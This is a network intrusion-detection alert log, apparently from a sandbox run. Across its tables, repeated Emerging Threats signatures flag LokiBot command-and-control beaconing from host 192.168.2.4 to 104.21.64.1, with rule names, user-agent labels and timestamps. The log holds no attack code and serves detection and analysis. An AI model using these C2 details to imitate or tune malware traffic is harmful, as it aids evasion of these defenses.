2025-02-20T03:45:17.298173+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50067	104.21.64.1	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-20T03:43:14.427531+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50067	TCP
2025-02-20T03:43:18.285091+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49733	TCP
2025-02-20T03:43:20.272240+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49734	TCP
2025-02-20T03:43:22.580509+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49735	TCP
2025-02-20T03:43:26.470269+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49737	TCP
2025-02-20T03:43:32.309783+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49745	TCP
2025-02-20T03:43:38.075914+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49749	TCP
2025-02-20T03:43:41.920221+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49751	TCP
2025-02-20T03:43:43.912590+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49752	TCP
2025-02-20T03:43:47.717726+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49754	TCP
2025-02-20T03:43:49.667999+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49755	TCP
2025-02-20T03:43:53.550248+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49757	TCP
2025-02-20T03:43:55.488427+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49758	TCP
2025-02-20T03:43:59.472981+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49760	TCP
2025-02-20T03:44:01.399671+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49761	TCP
2025-02-20T03:44:03.208740+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49762	TCP
2025-02-20T03:44:05.175755+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49763	TCP
2025-02-20T03:44:09.173953+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49766	TCP
2025-02-20T03:44:13.099060+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49779	TCP
2025-02-20T03:44:15.066841+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49793	TCP
2025-02-20T03:44:17.022997+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49806	TCP
2025-02-20T03:44:20.915778+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49829	TCP
2025-02-20T03:44:24.824962+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49854	TCP
2025-02-20T03:44:26.639425+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49868	TCP
2025-02-20T03:44:32.668381+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49908	TCP
2025-02-20T03:44:34.666252+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49922	TCP
2025-02-20T03:44:38.565398+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49946	TCP
2025-02-20T03:44:40.533589+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49958	TCP
2025-02-20T03:44:42.380787+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49973	TCP
2025-02-20T03:44:44.276001+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49986	TCP
2025-02-20T03:44:46.217280+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	49999	TCP
2025-02-20T03:44:50.023196+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50027	TCP
2025-02-20T03:44:52.091745+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50041	TCP
2025-02-20T03:44:54.035383+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50053	TCP
2025-02-20T03:44:56.242976+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50056	TCP
2025-02-20T03:44:58.222823+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50057	TCP
2025-02-20T03:45:00.186635+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50058	TCP
2025-02-20T03:45:02.160343+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50059	TCP
2025-02-20T03:45:04.188919+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50060	TCP
2025-02-20T03:45:06.111884+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50061	TCP
2025-02-20T03:45:12.136494+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50064	TCP
2025-02-20T03:45:14.088586+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50065	TCP
2025-02-20T03:45:16.105934+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.4	50066	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-20T03:43:18.278303+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49733	104.21.64.1	80	TCP
2025-02-20T03:43:20.267191+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49734	104.21.64.1	80	TCP
2025-02-20T03:43:22.574776+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49735	104.21.64.1	80	TCP
2025-02-20T03:43:24.489416+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49736	104.21.64.1	80	TCP
2025-02-20T03:43:26.463190+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49737	104.21.64.1	80	TCP
2025-02-20T03:43:28.504763+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49738	104.21.64.1	80	TCP
2025-02-20T03:43:30.375616+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49741	104.21.64.1	80	TCP
2025-02-20T03:43:32.302084+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49745	104.21.64.1	80	TCP
2025-02-20T03:43:34.207473+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49747	104.21.64.1	80	TCP
2025-02-20T03:43:36.139359+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49748	104.21.64.1	80	TCP
2025-02-20T03:43:38.070830+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49749	104.21.64.1	80	TCP
2025-02-20T03:43:39.936584+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49750	104.21.64.1	80	TCP
2025-02-20T03:43:41.914924+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49751	104.21.64.1	80	TCP
2025-02-20T03:43:43.907574+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49752	104.21.64.1	80	TCP
2025-02-20T03:43:45.839243+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49753	104.21.64.1	80	TCP
2025-02-20T03:43:47.712754+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49754	104.21.64.1	80	TCP
2025-02-20T03:43:49.660952+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49755	104.21.64.1	80	TCP
2025-02-20T03:43:51.567802+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49756	104.21.64.1	80	TCP
2025-02-20T03:43:53.545131+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49757	104.21.64.1	80	TCP
2025-02-20T03:43:55.482262+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49758	104.21.64.1	80	TCP
2025-02-20T03:43:57.403205+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49759	104.21.64.1	80	TCP
2025-02-20T03:43:59.467933+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49760	104.21.64.1	80	TCP
2025-02-20T03:44:01.394606+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49761	104.21.64.1	80	TCP
2025-02-20T03:44:03.203757+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49762	104.21.64.1	80	TCP
2025-02-20T03:44:05.170718+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49763	104.21.64.1	80	TCP
2025-02-20T03:44:07.123723+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49764	104.21.64.1	80	TCP
2025-02-20T03:44:09.168850+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49766	104.21.64.1	80	TCP
2025-02-20T03:44:11.054295+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49768	104.21.64.1	80	TCP
2025-02-20T03:44:13.092683+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49779	104.21.64.1	80	TCP
2025-02-20T03:44:15.060888+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49793	104.21.64.1	80	TCP
2025-02-20T03:44:17.017876+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49806	104.21.64.1	80	TCP
2025-02-20T03:44:18.948386+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49819	104.21.64.1	80	TCP
2025-02-20T03:44:20.910590+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49829	104.21.64.1	80	TCP
2025-02-20T03:44:22.852440+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49840	104.21.64.1	80	TCP
2025-02-20T03:44:24.819834+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49854	104.21.64.1	80	TCP
2025-02-20T03:44:26.634314+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49868	104.21.64.1	80	TCP
2025-02-20T03:44:28.529010+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49881	104.21.64.1	80	TCP
2025-02-20T03:44:30.432256+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49892	104.21.64.1	80	TCP
2025-02-20T03:44:32.663291+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49908	104.21.64.1	80	TCP
2025-02-20T03:44:34.661211+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49922	104.21.64.1	80	TCP
2025-02-20T03:44:36.566884+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49934	104.21.64.1	80	TCP
2025-02-20T03:44:38.560384+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49946	104.21.64.1	80	TCP
2025-02-20T03:44:40.528513+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49958	104.21.64.1	80	TCP
2025-02-20T03:44:42.375594+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49973	104.21.64.1	80	TCP
2025-02-20T03:44:44.228854+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49986	104.21.64.1	80	TCP
2025-02-20T03:44:46.211968+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49999	104.21.64.1	80	TCP
2025-02-20T03:44:48.129551+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50013	104.21.64.1	80	TCP
2025-02-20T03:44:50.017620+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50027	104.21.64.1	80	TCP
2025-02-20T03:44:52.086657+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50041	104.21.64.1	80	TCP
2025-02-20T03:44:54.030291+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50053	104.21.64.1	80	TCP
2025-02-20T03:44:56.235776+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50056	104.21.64.1	80	TCP
2025-02-20T03:44:58.216631+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50057	104.21.64.1	80	TCP
2025-02-20T03:45:00.181510+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50058	104.21.64.1	80	TCP
2025-02-20T03:45:02.154762+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50059	104.21.64.1	80	TCP
2025-02-20T03:45:04.177292+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50060	104.21.64.1	80	TCP
2025-02-20T03:45:06.106556+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50061	104.21.64.1	80	TCP
2025-02-20T03:45:08.243365+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50062	104.21.64.1	80	TCP
2025-02-20T03:45:10.160329+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50063	104.21.64.1	80	TCP
2025-02-20T03:45:12.131378+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50064	104.21.64.1	80	TCP
2025-02-20T03:45:14.083485+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50065	104.21.64.1	80	TCP
2025-02-20T03:45:16.100549+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50066	104.21.64.1	80	TCP
2025-02-20T03:45:18.101250+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50067	104.21.64.1	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-20T03:43:14.532930+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49731	104.21.64.1	80	TCP
2025-02-20T03:43:16.479030+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49732	104.21.64.1	80	TCP
2025-02-20T03:43:17.451575+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49733	104.21.64.1	80	TCP
2025-02-20T03:43:19.442017+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49734	104.21.64.1	80	TCP
2025-02-20T03:43:21.771429+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49735	104.21.64.1	80	TCP
2025-02-20T03:43:23.729997+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49736	104.21.64.1	80	TCP
2025-02-20T03:43:25.651126+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49737	104.21.64.1	80	TCP
2025-02-20T03:43:27.752713+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49738	104.21.64.1	80	TCP
2025-02-20T03:43:29.660543+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49741	104.21.64.1	80	TCP
2025-02-20T03:43:31.521910+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49745	104.21.64.1	80	TCP
2025-02-20T03:43:33.456489+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49747	104.21.64.1	80	TCP
2025-02-20T03:43:35.363345+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49748	104.21.64.1	80	TCP
2025-02-20T03:43:37.303125+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49749	104.21.64.1	80	TCP
2025-02-20T03:43:39.205648+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49750	104.21.64.1	80	TCP
2025-02-20T03:43:41.134380+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49751	104.21.64.1	80	TCP
2025-02-20T03:43:43.094784+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49752	104.21.64.1	80	TCP
2025-02-20T03:43:45.102723+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49753	104.21.64.1	80	TCP
2025-02-20T03:43:46.997245+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49754	104.21.64.1	80	TCP
2025-02-20T03:43:48.866259+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49755	104.21.64.1	80	TCP
2025-02-20T03:43:50.820013+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49756	104.21.64.1	80	TCP
2025-02-20T03:43:52.721741+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49757	104.21.64.1	80	TCP
2025-02-20T03:43:54.693351+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49758	104.21.64.1	80	TCP
2025-02-20T03:43:56.661305+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49759	104.21.64.1	80	TCP
2025-02-20T03:43:58.705695+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49760	104.21.64.1	80	TCP
2025-02-20T03:44:00.632178+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49761	104.21.64.1	80	TCP
2025-02-20T03:44:02.549016+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49762	104.21.64.1	80	TCP
2025-02-20T03:44:04.348269+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49763	104.21.64.1	80	TCP
2025-02-20T03:44:06.337593+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49764	104.21.64.1	80	TCP
2025-02-20T03:44:08.290722+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49766	104.21.64.1	80	TCP
2025-02-20T03:44:10.316672+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49768	104.21.64.1	80	TCP
2025-02-20T03:44:12.216353+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49779	104.21.64.1	80	TCP
2025-02-20T03:44:14.257584+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49793	104.21.64.1	80	TCP
2025-02-20T03:44:16.237190+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49806	104.21.64.1	80	TCP
2025-02-20T03:44:18.180783+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49819	104.21.64.1	80	TCP
2025-02-20T03:44:20.117514+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49829	104.21.64.1	80	TCP
2025-02-20T03:44:22.080002+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49840	104.21.64.1	80	TCP
2025-02-20T03:44:24.005441+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49854	104.21.64.1	80	TCP
2025-02-20T03:44:25.986832+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49868	104.21.64.1	80	TCP
2025-02-20T03:44:27.785264+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49881	104.21.64.1	80	TCP
2025-02-20T03:44:29.675258+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49892	104.21.64.1	80	TCP
2025-02-20T03:44:31.765736+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49908	104.21.64.1	80	TCP
2025-02-20T03:44:33.834170+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49922	104.21.64.1	80	TCP
2025-02-20T03:44:35.821785+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49934	104.21.64.1	80	TCP
2025-02-20T03:44:37.738492+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49946	104.21.64.1	80	TCP
2025-02-20T03:44:39.722812+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49958	104.21.64.1	80	TCP
2025-02-20T03:44:41.717939+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49973	104.21.64.1	80	TCP
2025-02-20T03:44:43.553868+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49986	104.21.64.1	80	TCP
2025-02-20T03:44:45.418212+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49999	104.21.64.1	80	TCP
2025-02-20T03:44:47.367804+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50013	104.21.64.1	80	TCP
2025-02-20T03:44:49.319994+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50027	104.21.64.1	80	TCP
2025-02-20T03:44:51.269807+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50041	104.21.64.1	80	TCP
2025-02-20T03:44:53.251485+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50053	104.21.64.1	80	TCP
2025-02-20T03:44:55.447771+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50056	104.21.64.1	80	TCP
2025-02-20T03:44:57.397582+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50057	104.21.64.1	80	TCP
2025-02-20T03:44:59.369050+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50058	104.21.64.1	80	TCP
2025-02-20T03:45:01.395935+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50059	104.21.64.1	80	TCP
2025-02-20T03:45:03.336005+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50060	104.21.64.1	80	TCP
2025-02-20T03:45:05.459884+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50061	104.21.64.1	80	TCP
2025-02-20T03:45:07.274491+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50062	104.21.64.1	80	TCP
2025-02-20T03:45:09.425072+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50063	104.21.64.1	80	TCP
2025-02-20T03:45:11.338444+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50064	104.21.64.1	80	TCP
2025-02-20T03:45:13.295502+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50065	104.21.64.1	80	TCP
2025-02-20T03:45:15.286586+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50066	104.21.64.1	80	TCP
2025-02-20T03:45:17.298173+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50067	104.21.64.1	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-20T03:43:14.532930+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49731	104.21.64.1	80	TCP
2025-02-20T03:43:16.479030+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49732	104.21.64.1	80	TCP
2025-02-20T03:43:17.451575+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49733	104.21.64.1	80	TCP
2025-02-20T03:43:19.442017+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49734	104.21.64.1	80	TCP
2025-02-20T03:43:21.771429+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49735	104.21.64.1	80	TCP
2025-02-20T03:43:23.729997+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49736	104.21.64.1	80	TCP
2025-02-20T03:43:25.651126+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49737	104.21.64.1	80	TCP
2025-02-20T03:43:27.752713+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49738	104.21.64.1	80	TCP
2025-02-20T03:43:29.660543+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49741	104.21.64.1	80	TCP
2025-02-20T03:43:31.521910+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49745	104.21.64.1	80	TCP
2025-02-20T03:43:33.456489+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49747	104.21.64.1	80	TCP
2025-02-20T03:43:35.363345+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49748	104.21.64.1	80	TCP
2025-02-20T03:43:37.303125+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49749	104.21.64.1	80	TCP
2025-02-20T03:43:39.205648+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49750	104.21.64.1	80	TCP
2025-02-20T03:43:41.134380+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49751	104.21.64.1	80	TCP
2025-02-20T03:43:43.094784+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49752	104.21.64.1	80	TCP
2025-02-20T03:43:45.102723+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49753	104.21.64.1	80	TCP
2025-02-20T03:43:46.997245+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49754	104.21.64.1	80	TCP
2025-02-20T03:43:48.866259+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49755	104.21.64.1	80	TCP
2025-02-20T03:43:50.820013+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49756	104.21.64.1	80	TCP
2025-02-20T03:43:52.721741+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49757	104.21.64.1	80	TCP
2025-02-20T03:43:54.693351+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49758	104.21.64.1	80	TCP
2025-02-20T03:43:56.661305+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49759	104.21.64.1	80	TCP
2025-02-20T03:43:58.705695+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49760	104.21.64.1	80	TCP
2025-02-20T03:44:00.632178+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49761	104.21.64.1	80	TCP
2025-02-20T03:44:02.549016+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49762	104.21.64.1	80	TCP
2025-02-20T03:44:04.348269+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49763	104.21.64.1	80	TCP
2025-02-20T03:44:06.337593+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49764	104.21.64.1	80	TCP
2025-02-20T03:44:08.290722+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49766	104.21.64.1	80	TCP
2025-02-20T03:44:10.316672+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49768	104.21.64.1	80	TCP
2025-02-20T03:44:12.216353+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49779	104.21.64.1	80	TCP
2025-02-20T03:44:14.257584+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49793	104.21.64.1	80	TCP
2025-02-20T03:44:16.237190+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49806	104.21.64.1	80	TCP
2025-02-20T03:44:18.180783+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49819	104.21.64.1	80	TCP
2025-02-20T03:44:20.117514+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49829	104.21.64.1	80	TCP
2025-02-20T03:44:22.080002+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49840	104.21.64.1	80	TCP
2025-02-20T03:44:24.005441+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49854	104.21.64.1	80	TCP
2025-02-20T03:44:25.986832+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49868	104.21.64.1	80	TCP
2025-02-20T03:44:27.785264+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49881	104.21.64.1	80	TCP
2025-02-20T03:44:29.675258+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49892	104.21.64.1	80	TCP
2025-02-20T03:44:31.765736+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49908	104.21.64.1	80	TCP
2025-02-20T03:44:33.834170+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49922	104.21.64.1	80	TCP
2025-02-20T03:44:35.821785+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49934	104.21.64.1	80	TCP
2025-02-20T03:44:37.738492+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49946	104.21.64.1	80	TCP
2025-02-20T03:44:39.722812+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49958	104.21.64.1	80	TCP
2025-02-20T03:44:41.717939+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49973	104.21.64.1	80	TCP
2025-02-20T03:44:43.553868+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49986	104.21.64.1	80	TCP
2025-02-20T03:44:45.418212+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49999	104.21.64.1	80	TCP
2025-02-20T03:44:47.367804+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50013	104.21.64.1	80	TCP
2025-02-20T03:44:49.319994+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50027	104.21.64.1	80	TCP
2025-02-20T03:44:51.269807+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50041	104.21.64.1	80	TCP
2025-02-20T03:44:53.251485+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50053	104.21.64.1	80	TCP
2025-02-20T03:44:55.447771+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50056	104.21.64.1	80	TCP
2025-02-20T03:44:57.397582+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50057	104.21.64.1	80	TCP
2025-02-20T03:44:59.369050+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50058	104.21.64.1	80	TCP
2025-02-20T03:45:01.395935+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50059	104.21.64.1	80	TCP
2025-02-20T03:45:03.336005+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50060	104.21.64.1	80	TCP
2025-02-20T03:45:05.459884+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50061	104.21.64.1	80	TCP
2025-02-20T03:45:07.274491+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50062	104.21.64.1	80	TCP
2025-02-20T03:45:09.425072+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50063	104.21.64.1	80	TCP
2025-02-20T03:45:11.338444+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50064	104.21.64.1	80	TCP
2025-02-20T03:45:13.295502+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50065	104.21.64.1	80	TCP
2025-02-20T03:45:15.286586+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50066	104.21.64.1	80	TCP
